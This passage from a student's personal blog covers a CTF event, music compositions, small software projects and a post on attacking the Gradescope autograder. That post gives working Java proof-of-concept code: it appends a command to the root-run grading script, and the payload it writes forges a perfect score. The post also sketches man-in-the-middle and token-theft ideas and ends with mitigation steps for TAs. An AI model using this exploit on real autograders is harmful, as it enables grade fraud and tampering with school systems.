Now we define a new ABE model that trains the above three models at the same time. We randomly generate a plain message and a key, encrypt the message using the Alice model, decrypt it using the Bob model, and define the Alice-Bob Loss as the difference between the original message and the decrypted message. We feed the encrypted intermediate message into Eve and calculate the Eve Loss. The ABE model loss is then defined as $\text{Alice-Bob Loss} + \frac{\left(32 - \text{Eve Loss}\right)^2}{ 32^2 }$, where $32$ is half the message size. I don’t know where the equation came from, but apparently this model is an Adversarial Network, as it wants the Alice-Bob Loss to be as small as possible, and at the same time the Eve Loss to be as large as possible.
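
Evaluating the formula as written at a few points shows how the Eve term behaves. The helper below is only a direct transcription of the expression above into Python; the function and parameter names are mine.

```python
def abe_loss(alice_bob_loss, eve_loss, message_bits=64):
    """Alice-Bob Loss + (half - Eve Loss)^2 / half^2, with half = bits / 2."""
    half = message_bits / 2
    return alice_bob_loss + (half - eve_loss) ** 2 / half ** 2

# Eve term alone (Alice-Bob Loss set to 0) at a few Eve Loss values.
eve_term = {e: abe_loss(0.0, e) for e in (0.0, 16.0, 32.0, 64.0)}
```

Taken literally, the Eve term is 0 when the Eve Loss equals 32 and rises to 1 when the Eve Loss is 0 or 64, so the penalty is largest when Eve’s loss is far from half the message size in either direction.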

With the above sorted out, I started experimenting with a lot of things. First, I confirmed that encryption and decryption depend heavily on the weights (and thus the training time) rather than on the model structure: if I encrypted a message with a model that I trained for 5 minutes, a model that I trained for 30 minutes could not decrypt it even with the correct key, and vice versa. Second, I realized that if you didn’t train the models long enough, the decryption could be broken easily. Third, even if the key isn’t right, the entropy of the decrypted message stays roughly the same, which means that if the decrypted message is mostly 0x00 or 0xFF, it is most likely the model weights that are off rather than the key.

So I first tried to observe the training process. At each epoch, I decrypted the first 8 bytes (one message) of the given encrypted message with a random key, to see when it would spit out a decrypted text with the right-looking entropy. I watched for a long time, but it didn’t seem to give any useful information.

I then thought it might be possible to use the Eve model to do something. I knew that the Eve model must already have a large enough loss for the ABE model to work, so it wouldn’t work if I tried to use it to decrypt the entire message. However, that is under the assumption that the keys are different each time. What if the Eve model could work when the decryption keys are the same, and the weights would do the magic?

In the meantime, my teammates found some repeating (8-byte) messages in the original HTML, and figured out where the changes were made by comparing the locations of the repeating messages within the same bunch in the plain text and in the given encrypted message. They concluded that one change happened at around 12,000 bytes.

This gave me much hope, as I could be sure that no changes were made before 10,000 bytes, which meant I had about 1,250 training points to use. My idea was to first use the first 16 messages to train an Eve model that decrypts these 16 messages and, consequently, the first generated key stored as the 17th message; then use the next 16 messages to train another Eve model that does the same job. After finding the keys for the first 1,250 messages, I could use them to train a Bob model that works for this dataset, and use it to decrypt the entire text.

However, someone beat me to it and got the flag. When I looked at his exploit, there was NO machine learning involved. The exploit simply computed some matrices and solved a linear matrix equation to get a transformation matrix between the encrypted message and the plain message. I was like, WHAT?

threefactooorx

2:30 PM

While doing smart-cryptooo, I jumped out to see what was going on with this literally “one-and-only” web challenge. There was only a website for uploading an HTML file, and one file to download with a .crx extension. I realized that the goal must be to write an HTML exploit that cracks this Chrome extension. Unzipping the extension, we find two scripts: a background JS file that seemingly returns the flag, and another JS file that is obfuscated. However, it really wasn’t much of an obfuscation, and after manually restoring some of the strings it was pretty clear what we needed to do for the script to print the flag for us.

There were too many other people working on this challenge, and they were all faster than me since I was late to the game. Before long they got the flag.

looocked-ooout

12:15 AM, after midnight

Before I went to sleep, I wanted to see whether there was anything I could still do for the team. And yet another pwn. I think the goal might be to pwn the given cid binary, which is seemingly an mp3 loader, maybe by crafting a special mp3 or something. Dragged it into Ghidra, analyzed, decompiled, shook my head, and closed all the windows.

0xFF

Woke up after the event was over. Really nice to see that our team finished in third place, meaning a qualification for the finals (although I won’t be there). Also really surprised to see that there was even a time (an hour before the end) when we were in first place, although I contributed nothing to it.

After playing in such a professional, competitive, and polished CTF event, I think I still have a lot to learn, specifically in pwn and reversing. One thing I feel okay about is that I could keep up with the pace, and I at least provided some insights for my teammates on some of the challenges, even though it was my first time in a CTF. Also, the format was jeopardy rather than attack-defense, the latter being another whole new area in which I have absolutely no experience.

CTF is definitely something interesting that I want to experience again. Until then, see you next time.

P.S. I have this idea that it might be interesting to come up with an easy CTF/ARG for university students to play. If you have the same idea, contact me!

Compositions

2020-12-14T23:45:00-05:00

Here are some of my compositions in music.

MUSC 79

Dream in Pure Data

Dream in Pure Data by SuperFashi

A 1h30m run of my Pure Data patch.

Retro Gameplaying as Instrument Interface

I think current instruments lack certain feedback to the performers and especially audiences. Live performances will normally have an auxiliary visual element (like laser lights synced to the music or generative visuals), which is more of an effect rather than a cause. Even for Launchpad performances, most of the time the visuals on the grid are nothing more than flashes of lights. It will be interesting, then, to perform an instrument by playing the game, or to play the game by performing the instrument, such that each interaction by the performer does not only create sounds/music, but also at the same time creates the visualization of the music (which is a gameplay meaningful by itself). This should further blur the line between sounds and visuals, and hopefully will create unique interactive feedback.

MUSC 77

Intro to Electronic Music by SuperFashi

All music was produced with a MacBook Pro and Logic Pro stock plugins and instruments.

Recorded, written, composed, programmed, mixed, mastered by me.

Elevator Music

The entire track was made from a field recording of an elevator in Harrison College House. The elevator runs through 26 floors (24 floors plus the bottom level and the penthouse), which makes for a natural 1+4x6+1 structure. I used the first buzz as a lead-in, then the next 4x6 as 6 different sections with 4 buzzes (bars) in each section, and the last buzz as the final climax.

All sounds were derived from the original recording by routing the raw recording to different buses with different effects. No synthesizer/sampling/flex-pitch involved.

Tech, no?

The track follows the idea of a 2/4 - 3/4 - 4/4 meter change. The 2/4 meter doesn’t exist in the composition but exists as a 2-against-3 polyrhythm on the 3/4 meter. I hand-tuned some of the cymbal notes to accent downbeats and upbeats, but instead of the actual upbeat and downbeat of the meter, I accented them in different places to produce a polymeter feeling.

Only Drum Synth was used in this track for instrumentation. Automation was heavily used to adjust parameters of different Drum Synths to simulate a realistic drum playing effect.

None Shall Sleep

The track uses samples from a version of “Nessun dorma” performed by Luciano Pavarotti. The choice of sampling from opera is to deviate from the normal mindset of sampling from 70s/80s songs. Only the drums and electronic piano are not from the sample.

The sample was loaded in by Q-sampler and sample points were hand-chosen. The “fake-out intro” plays 2X speed of the sample, while the actual track uses 4X speed of the sample. The entire sample is pitch-shifted 10 semitones up.

Dark Woods

7 Retro Synths and 1 Alchemy were used for this track. Synths with different textures were introduced one by one to draw the listener’s focus to the new timbre. Automation is used for mixing, while multiple Randomizers and Modulators are used for synth parameters.

An A=432Hz and 17-TET Pythagorean tuning system is used in this work. This is inspired by, of course, Wendy Carlos.

Dance

Heavily inspired by Yasutaka Nakata’s work, I wanted to make a similar work that features his signature dance pop style. I chose the classic Verse-Chorus in ABA’BCB form, with Intro and Pre-Chorus in mind, which is what he uses a lot on his productions for KPP.

Also influenced by him, the choice of transition between sections was done in a seamless manner. Subtle hints in harmony, melody and percussion were used to pace the song and push the energy into the next section.

MUSC 70

For B.G.

This is the second composition work for the course. We were asked to use simple triads in our piece, and to use roman numerals with a bass note to represent them. I also added a staccato flavor and a key change in the middle just to make the piece sound a bit more unique. The beginning interval was borrowed from Cambridge, 1963 by Jóhann Jóhannsson, which I think has a very bright feeling.

The piece was named For B.G. simply because I asked her what a good name would be and she said “why not have it for me.” (or something like that)

MuseScore

SoundCloud

Performed by Erin Busch.

Music 70 · Hanbang Wang - For B.G.

Over the Rainbow

This is the third and final composition assignment for the course. We were asked to use seventh chords in this piece and write it in a lead sheet style. I wrote it in an AABA form like a pop song, but so slow that it’s like a lullaby lol. The piece was named Over the Rainbow because I wrote a lot of almost-octave jumps, which just reminds me of that song.

MuseScore

SoundCloud

Performed by Erin Busch.

Music 70 · Hanbang Wang - Over the Rainbow

Hacking Gradescope Autograder

2019-12-27T10:00:00-05:00

So yeah, every script-kiddie has this little dream of hacking his own school to get a perfect score.

Prologue

Gradescope is an online grading platform for schools, founded by an instructor at UC Berkeley. Some of its security issues were exposed long ago by guys from MIT as their final course project^[1].

Me, on the other hand, just wanna realize my dream to hack my score when things hit me hard.

Now, the MIT guys had already done a lot, including showing that we can directly read the source code of the autograder and upload it to a remote server (details in the paper, section 5.3.2, or down below). But they failed to achieve the final step, which obviously is to change one’s score freely.

Disclaimer

Now before you continue:

The following content and all associated programming code (“this work”) are written and developed solely for educational and research purposes. Using this work in an uncontrolled production environment, without the permission of the owner of the autograder, may result in breaking Gradescope’s Terms of Use, and may potentially violate your affiliation’s Code of Conduct. Under no circumstances shall I be liable for any misuse of this work.

Details

First a little recap. The following is a rough flowchart of how a general Gradescope autograder works:

The line in red indicates where our code will start running. Anything before this is totally uncontrollable without administrative privileges (being an instructor or having control over Gradescope’s server).

It seems that we have ruled out many potential options. However, due to the nature of Gradescope’s autograder, run_autograder is executed with root permission. This means that anything that runs directly as a child process of run_autograder runs as root too.

Our submitted code now has the root permission, and this opens up a whole new door towards arbitrary code execution.

Exploitation

With the power of root, we can literally traverse all the files on the server (more specifically, inside the Docker container, absent a sandbox escape exploit), and upload them to a remote server controlled by the user, since we also have Internet access.

Normies would stop here and say, “well we have the test cases just study them and debug your code.” ⒻⒶⒸⓉ, but not enough. As a TA myself, I tend to write large random fuzzing tests that generate stuff no one understands. Therefore, we need the power to change the scores directly.

Direct Output

The first thing that comes to mind is to write directly to the output file, results.json. The path to it is absolutely fixed (/autograder/results/results.json), and we know the format of the output from the documentation. It seems that all we need to do is write to the file directly, and that’s it.

However, take a look at the flowchart and you will realize that results.json is written by run_autograder after the tests are finished. This means whatever we write to the file gets overwritten by the real autograder results.

This seems to have an easy fix: after our code writes to the file, just set the file to immutable so that the real autograder cannot overwrite it. The problem is that Docker by default runs containers without the CAP_LINUX_IMMUTABLE capability, so the immutable flag cannot be set (e.g. with chattr +i); and even if you make the file unwritable by anyone with chmod, it can still be overwritten, since the autograder runs as root.

This is a no-go.

Direct Submission

Following the path on the flowchart, the next thing that caught my eye is the step where harness.py uploads the result via an HTTP POST request. If Gradescope automatically accepts and parses the first result that comes in, it may potentially ignore any following request.

The task then is to send an HTTP request to the URL for submitting the result. Looking into the source code of harness.py, it turns out the URL is acquired from the environment variables. Everything seems to be going well: the user code can successfully get the URL from the environment, but the HTTP request simply fails.

A deeper look into the source code showed that an authentication token needs to be sent in the header along with the request. Although the token is acquired from the environment variables as well, Gradescope developers actually paid attention to this little detail and delete the environment variable after it is loaded. The result is that any child process of harness.py is not able to get that environment variable.
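The effect of deleting the variable can be reproduced with a small sketch. This is not Gradescope's actual code: the variable name DEMO_TOKEN and both helper functions are made up for illustration, and the only claim is the general behavior of environment inheritance.

```python
import os
import subprocess
import sys


def load_and_scrub(name: str):
    """Read a secret from the environment, then remove it so children cannot inherit it."""
    # os.environ.pop also unsets the variable for processes spawned afterwards.
    return os.environ.pop(name, None)


def child_sees(name: str) -> str:
    """Spawn a child Python process and report what it finds under that name."""
    code = "import os; print(os.environ.get(%r))" % name
    result = subprocess.run([sys.executable, "-c", code],
                            capture_output=True, text=True, check=True)
    return result.stdout.strip()


if __name__ == "__main__":
    os.environ["DEMO_TOKEN"] = "s3cret"   # hypothetical token, set by the parent
    print(child_sees("DEMO_TOKEN"))        # the child can still read it here
    token = load_and_scrub("DEMO_TOKEN")   # parent keeps the value in memory only
    print(child_sees("DEMO_TOKEN"))        # the child no longer finds it
```

The parent still holds the token in its own memory, which is why only something like a memory dump of the parent process could recover it.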

What a pity.

thoughts…

While writing this, it occurred to me that we could spin up a fake web server that MITMs the submission. We can point the URL’s hostname to a loopback address in the hosts file and make harness.py hit our fake server, change the payload, and forward it to the real remote server.

One detail to take care of is that the URL uses the HTTPS protocol, meaning that we have to generate a self-signed certificate and trust it locally. I’m not quite sure how Python’s HTTP library works, and whether it would load the certificate in time or cache it. Nonetheless, this could potentially work.

Also, there could be other methods to extract the authentication token, such as dumping the memory of the running harness.py script and searching through it. But that could be way too hardcore for our script-kiddie oriented write-up here.

Bottleneck

We need to make sure results.json is changed after the real results are written, but before results.json is read and uploaded by harness.py. Looking at the flowchart, this does not leave us much room. It also seems to be an impossible job: results.json is written after our code finishes executing, so how could we do anything if our code is no longer running?

Naturally, we need some kind of delayed mechanism that still works after our code exits. I tried cron and sleep, but both of them are polling-based and need precise timing, which doesn’t seem to work well in this scenario (maybe just bad luck for me).

thoughts…

While writing this, it occurred to me that we could use inotify-related utilities to watch for changes to the results.json file, which turns the scenario into an interrupt-driven case. If fast enough, we may squeeze in between the moment run_autograder writes the file and the moment harness.py reads it to make the change.

A New Light

All hope seems gone, although you might have already noticed the larger arrow in the flowchart. It sits after the autograder result is written to results.json, but before run_autograder exits. It would be perfect if we could do something at this time, but how?

I can’t help but think: can we make run_autograder do the things we want it to do? At first glance, this is implausible, as run_autograder is written by the instructors and is there before our code starts running. This is true for almost all executables, since it is impossible to change the instructions of a running program (without considering some hardcore injection, that is). This is also why we can’t directly change harness.py to make it do what we want.

But run_autograder is an exception. Although the documentation says that run_autograder could be any type of executable file, the examples provided by Gradescope are written as shell scripts, so many autograders follow suit.

What’s wrong with shell scripts? Well, shell scripts are read and executed line by line, which means that if we append new lines to the script before it finishes, the new lines get executed too. As run_autograder also has a fixed path, our life becomes tremendously easier. All that is left to do is to append the commands we want it to execute to the end of the file, and that’s it.
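The line-by-line behavior is easy to try out locally. The sketch below is only a harmless demonstration with a throwaway script (the file name run_autograder_demo.sh and the function are hypothetical); it assumes an sh such as bash or dash is available, both of which read script files incrementally.

```python
import os
import subprocess
import tempfile
import time


def run_with_late_append(delay: float = 0.3):
    """Start a shell script, append a line while it is sleeping, and return its output words."""
    with tempfile.TemporaryDirectory() as tmp:
        script = os.path.join(tmp, "run_autograder_demo.sh")
        with open(script, "w") as f:
            f.write("echo start\nsleep 1\necho end\n")
        # Launch the script; it will be blocked in `sleep 1` for a while.
        proc = subprocess.Popen(["sh", script], stdout=subprocess.PIPE, text=True)
        time.sleep(delay)
        # Append a new command while the script is still running.
        with open(script, "a") as f:
            f.write("echo appended\n")
        out, _ = proc.communicate()
        return out.split()


if __name__ == "__main__":
    print(run_with_late_append())
```

If the shell behaves as described, the appended echo shows up in the output after the script's original last line, even though it did not exist when the script was started.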

The Final Payload

I decided to write an actual Python script to /autograder/exploit.py, and then append a single line, python /autograder/exploit.py, to the end of run_autograder. The following is the POC code I used for a Java autograder. I also tried it with a Python autograder, which works fine as well. Other autograders should theoretically work too, as long as they use a shell script as the run_autograder file.

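import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.nio.file.StandardOpenOption;

public class Submission {
    // Any method that the test suite invokes will do; question1 is just an example.
    public static void question1() {
        // Python payload that overwrites the real results with a perfect score.
        final String exploit = "import json\n" +
                "with open('/autograder/results/results.json', 'w') as f:\n" +
                "    f.write('{\"score\": 100.0}')";
        final Path exploitPath = Paths.get("/autograder/exploit.py");
        // Plant the payload only once, even if the tests call this method repeatedly.
        if (Files.notExists(exploitPath)) {
            final Path agPath = Paths.get("/autograder/run_autograder");
            try {
                // Append a line to the still-running shell script so that it
                // runs the payload after the real results have been written.
                Files.write(agPath, "\npython /autograder/exploit.py".getBytes(),
                        StandardOpenOption.APPEND);
                // Write the payload itself to the fixed path referenced above.
                Files.write(exploitPath, exploit.getBytes(),
                        StandardOpenOption.WRITE, StandardOpenOption.CREATE);
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }
}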

This is a POC exploit that overwrites the real autograder output and sets the score to 100. It assumes that Submission.question1() will be invoked somewhere during the tests.

Prevention

According to the paper written by the MIT guys, this problem has existed since 2016, when the autograder was still in beta. Based on this, I guess Gradescope developers are not going to fix it anytime soon.

Hence, the responsibility to prevent students from using this exploit to achieve perfect scores lies on the shoulders of us TAs.

The fix is rather easy:

Create a new user account, say runner, that is not in the sudoers.
(e.g. sudo adduser runner --no-create-home --disabled-password --gecos "")

Set all the files and folders with sensitive data (run_autograder, results/, source code, etc.) to be inaccessible by other users. (e.g. chmod o= )
However, make sure that the compiled executables or bytecode files (like .class for Java and .pyc for Python), and all related files, are still accessible by other users.

Then, when running the test suites, run them as the user runner.
(e.g. add sudo -u runner before the line that runs the tests)

And this should fix the problem.

This also prevents the student from seeing the source code. Although they could still upload the compiled files and decompile them, this should increase the difficulty a lot.

If your test suites do not need network access or stdout, you could potentially disable those as well, so that your autograder would truly become a black box for any student-submitted code.

Epilogue

Honestly, Gradescope is lacking a lot of useful features that are considered essential for us TAs who use Gradescope for everything from homework to exams grading (like there’s even no mutually exclusive lock for grading). The situation is not any better after being acquired by TurnItIn.

If someday I’m tired of dealing with it, I’ll write a new online grading platform myself.

Penn Automate

2019-04-12T19:00:00-04:00

Main Page: pennmate.com
Github Page: Penn Automate
LinkedIn Page: Penn Automate | LinkedIn

Introduction

On that special day, I twice missed the emails from PennCourseNotify and PennCourseAlert for EAS-203, so I was a bit angry.

This is when the idea of Penn Automate came up. Penn Automate stands for a series of simple apps that help Penn students automate tasks that are usually repetitive or hard for humans.

Penn Automate is usually abbreviated to Pennmate as a prefix to all apps affiliated with this project. This project is planned to be fully open-sourced on Github.

The website for this project is still under construction by the time you see this post, but it is planned to be created in the next few weeks, depending on the feedback given to the first app.

Technical Details

The server is hosted on AWS Lightsail.

The main backend is written in PHP with Nginx as webserver and MySQL as database.

Go is used for microservices, snippets, and daemons to assist with the services.

Flutter and Dart are used for writing mobile apps. Other cross-platform frameworks such as React Native are under consideration.

Bootstrap and jQuery are the frameworks currently used for front-end projects.

Mobile Apps

Pennmate Notify

Github page: Pennmate Notify App

The notification by email is not stupid; it’s just slow. The process of sending emails is not concurrent; the email takes much more time to actually arrive in your inbox; massive emails from the same address could trigger anti-spam; and the message might simply not pop up, or get easily mixed up with your other emails.

Also, there will be privacy concerns if you give out your email and the course you want to be in at the same time. The data could be easily correlated to your individual identity and used to figure out how you planned your schedule. I heard^{[citation needed]} that PennLabs is already doing this when you fill in your course on Penn Mobile.

So now forget about all that and embrace Pennmate Notify, an app that pushes simplicity and functionality to the maximum and does nothing other than tell you the course is open at the shortest notice.

Download

Google Play: Pennmate Notify - Apps on Google Play.

This app is written in Dart and uses the Flutter framework. It is natively a cross-platform app, meaning that it can run on both iOS and Android devices.

Unfortunately, it is not possible to install an app from an unknown source on non-jailbroken iOS devices. The only way for me is to obtain a developer account from Apple, which would cost me $99/yr. im cute plz give me money

Browser Extension

Pennmate Notify

Github page: Pennmate Notify Chrome
Download: Pennmate Notify - Chrome Web Store

Free Tutoring

2019-01-22T18:40:00-05:00

Starting from Fall 2019, I work under The Tutoring Center. It is one of three offices within the Weingarten Learning Resources Center, and offers Penn undergraduate students free, accessible, and convenient options to supplement their academic experience. Tutoring is available one-on-one and in groups, by appointment and walk-in.

Introduction

Free tutoring by me is now open for anyone at Penn studying computer science or related science and technology. You can ask questions over email, or come to my room at the address and during the times listed below.

I’d love to teach anything related to, or answer questions about, computer science, including software and hardware, PC problems and server maintenance, algorithms and debugging, programming languages, and so forth.

Apart from CS, I can also teach Native Mainland Mandarin™, if that’s what you need.

I also like music, games, and Japanese anime. If you want to find a person with whom you can discuss those, you are also very welcome.

Sending me an email with the time you want to come by at least 30 minutes in advance is appreciated, and I will reply if I’m free. Walk-ins are also appreciated, but you simply may not find me.

Again, this whole tutoring thing is completely free!

Address and Timeslots

Spring 2019

Wednesday, 11:00 A.M. - 8:00 P.M.
Friday/Saturday, 10:00 A.M. - 10:00 P.M.
Sunday, 10:00 A.M. - 8:00 P.M.

Room 310, Van Pelt, Gregory

Fall 2019/Spring 2020

I tutor CIS 120 and CIS 160 in these semesters. For more information please refer to The Tutoring Center.

Fall 2020/Spring 2021

Temporarily stopped tutoring as remote learning is taking a toll on everyone.

Summer 2021

Contact me via email and we can do remote learning, yay!

Public Chat Server

2018-11-05T00:30:00-05:00

I just created a public server that you can all connect to using the given client hw07-client.jar.

Updated 12/15/2018: The server is off, thank you!

The server address is chat.hbang.wang, just type it in when you boot up the client.

You will join a channel All by default, and you can’t leave the channel unless you quit the client.

Due to the limitation of the parser, all nicknames and channel names can’t have spaces (and of course other names that can’t pass isValidName).

This is also a good place for you to figure out expected behaviors of the actions.

Have fun! And if you have any other questions feel free to comment down below.

Rajivelized Paint

2018-10-27T02:50:00-04:00

GUI in OCaml?

This is the second most ridiculous thing I’ve heard since the dawn of civilization—the first is inventing Node.js.

Well, obviously they had it compile to a desktop program for a few iterations of this class before, so we had all kinds of crappy serif-typeface font with awful interface design that doesn’t even match the aesthetic of Windows® 98.

Luckily we have JavaScript now, which is capable of interpreting ANYTHING. The typeface was changed to sans-serif, and now we have a and ocaml_to_js, everything is beautiful now.

NO! The code itself is disgusting! They ask for a strict coding style while the provided code is unformatted and like a bunch of crap mixed together (part of this is attributable to the Graphics module).

It resulted in me manually reading the code and fixing a dozen bugs, including that the canvas won’t redraw unless the user makes a detectable movement, and that the repaint function is invoked before the change is made, leaving the canvas always one frame behind.

Anyway, I have resolved most of the problems and updated related libraries, now we’re good to go.

Rajivelization

Original Flavor

Generate Bitmap

Unfortunately, the Graphics module is so incapable that we can’t load a PNG file into it. Therefore, after cutting Rajiv out in Photoshop (one of the purest software in the world, $20 a month w/ student discount, instant own), I wrote a little Go program to transform the PNG file with alpha channel into an (int * int * int) option list list, where None means transparent (of course I could use something like (-1, -1, -1) to represent it, but tHaT’S nOt elEgaNt).

The pseudo-code is as follows:

file := open_png(png_file)
bmp := bitmap(file)

print("let rajiv : (int * int * int) option list list = [")
for j := 0...height(bmp)
  print("[")
  for i := 0...width(bmp)
    r, g, b, a := rgba(bmp[i][j])
    if a = 0 then print("None;")
    else print("Some(r,g,b);")
  print("];")
print("]")

Now create a new rajiv.ml file and put the printed code above into it, and we’re done generating the bitmap needed for the program.
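For reference, the generation step can also be sketched in a runnable form. This is not the original Go program: it is a Python illustration that skips PNG decoding entirely and assumes the pixels are already available as rows of (r, g, b, a) tuples; the function name is hypothetical.

```python
def bitmap_to_ocaml(pixels) -> str:
    """Render rows of (r, g, b, a) pixels as an OCaml (int * int * int) option list list."""
    rows = []
    for row in pixels:
        cells = []
        for (r, g, b, a) in row:
            # Fully transparent pixels become None; everything else keeps its RGB value.
            cells.append("None" if a == 0 else f"Some({r},{g},{b})")
        rows.append("[" + ";".join(cells) + "]")
    return ("let rajiv : (int * int * int) option list list = ["
            + ";".join(rows) + "]")


if __name__ == "__main__":
    # One row with a red pixel followed by a transparent one.
    print(bitmap_to_ocaml([[(255, 0, 0, 255), (0, 0, 0, 0)]]))
```

The printed line is what would go into rajiv.ml; a real version would read the pixel rows from the PNG with an image library first.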

First Attempt

The first attempt was a quick try of the Graphics.plot function, which simply draws a pixel with the current color at a given location. By the way, that handsome photo of Mr. Rajiv was resized to 100x100px, so every time the program has to draw ten thousand pixels individually. “Every time” here means on every event, including MouseMove. The following code is a simple implementation of the idea.

List.iteri (fun i l ->
  List.iteri (fun j c ->
    match c with
    | None -> ()
    | Some (r', g', b') ->
      Graphics.set_color (Graphics.rgb r' g' b');
      Graphics.plot (x - j) (y - i)
  ) l
) Rajiv.rajiv

This is clearly not a solution: the third Rajiv drawn made the whole interface freeze, and it became impossible for the user to make any move.

Alternative Method

Looking for alternatives in the documentation, I found an interesting function called Graphics.draw_image, which takes a Graphics.image and draws it at a position. With the hope that this would work well, I looked for the function that generates one, which is make_image. It takes a Graphics.color array array and turns it into an image. Notice that we also have Graphics.transp as a transparent color. This is exactly what we’re looking for!

Although in class we only learned lists, it is easy to convert them to arrays since we have Array.of_list. A List.map call is enough:

Graphics.make_image (Array.of_list (
  List.map (fun l ->
    Array.of_list (
       List.map (fun c ->
         match c with
         | None -> Graphics.transp
         | Some (r', g', b') -> Graphics.rgb r' g' b'
       ) l
    )
  ) Rajiv.rajiv
))

The draw_image is way faster than plot. However, every time* the program has to turn a two-dimensional list into a 2D array, which is SUPER laggy. The image will flash every time* we make a move. This is somehow still not acceptable.

Optimization

The optimization is easy through caching. We just need to store the converted image somewhere so that we don’t have to call make_image every time*. It is easier said than done though, since make_image can’t be invoked at the beginning of the runtime, when the Graphics module is not initialized yet.

Luckily, values in OCaml are not fully immutable. We can create an image option ref and initialize it to ref None. The first time, we generate the image from the bitmap during runtime, and every time* after that we just take it from the cache, and we’re good to go. The problem is then solved, and the Rajivs are drawn extremely smoothly.

Chromajiv

Rajiv needs to be colorful, just as our lives. My idea was to use color sliders as an offset of the photo’s original color, specifically $RGB_{new} = \left(RGB_{old} + RGB_{offset}\right) \mod 256$.

We can’t perform the exact optimization this time since color changes, and we only stored one image (w/ original color) for Rajiv. However, we can use a database-like structure to store a key-value pair, where key is the offset color, and value is the image with the offset color. The best thing for database is for sure a map.

OCaml provides a Map.Make functor for us to make a map with a custom comparable key type and a generic value type. We could, of course, use an int tuple as the key, but that would be less efficient. On a second look, Graphics.color is an alias of int, where the color is stored in the 0xRRGGBB way. This is a classic example of bit packing. Knowing that, we can get ourselves a beautiful IntMap.

Every time* we just check whether the map has the color we want. If not, we call make_image with the new offset and store the result in the map; otherwise we just use the cached image. Now, we have the flawless, aesthetic :heart:chromajivelization.
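To make the 0xRRGGBB layout and the offset formula concrete, here is a small sketch of the arithmetic. It is written in Python purely for illustration; the function names are hypothetical and each channel is assumed to be in the range 0 to 255.

```python
def pack_rgb(r: int, g: int, b: int) -> int:
    """Pack three 8-bit channels into a single 0xRRGGBB integer."""
    return (r << 16) | (g << 8) | b


def unpack_rgb(color: int):
    """Split a 0xRRGGBB integer back into its (r, g, b) channels."""
    return (color >> 16) & 0xFF, (color >> 8) & 0xFF, color & 0xFF


def offset_color(rgb, offset):
    """Apply the slider offset per channel, wrapping around at 256."""
    return tuple((channel + delta) % 256 for channel, delta in zip(rgb, offset))


if __name__ == "__main__":
    key = pack_rgb(0x12, 0x34, 0x56)
    print(hex(key))                                   # the single int used as the map key
    print(unpack_rgb(key))
    print(offset_color((250, 10, 0), (10, 10, 10)))   # the red channel wraps around
```

Using the packed integer as the cache key means one comparison per lookup instead of comparing three tuple fields.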

Implementation

module IntMap = Map.Make(struct type t = int let compare = compare end)
let rajiv_image = ref IntMap.empty

let draw_rajiv (g: gctx) (cd: color) (p: position) : unit =
  let (x, y) = ocaml_coords g p in
  let c' = Graphics.rgb cd.r cd.g cd.b in
  if not (IntMap.mem c' !rajiv_image) then
    rajiv_image := IntMap.add c' (Graphics.make_image (Array.of_list (
      List.map (fun l ->
        Array.of_list (
           List.map (fun c -> 
             match c with
             | None -> Graphics.transp
             | Some (r', g', b') ->
               Graphics.rgb ((r' + cd.r) mod 256)
                            ((g' + cd.g) mod 256)
                            ((b' + cd.b) mod 256)
           ) l
        )
      ) Rajiv.rajiv
    ))) !rajiv_image;
  Graphics.draw_image (IntMap.find c' !rajiv_image) x y

Demo

Paint!

I prefer not to publish my source code on this one. However, I managed to port the Paint JS file locally and made some alterations. Now it runs on a single page without annoying pop-ups. You are free to try it out and comment down below, or ask any questions via email.
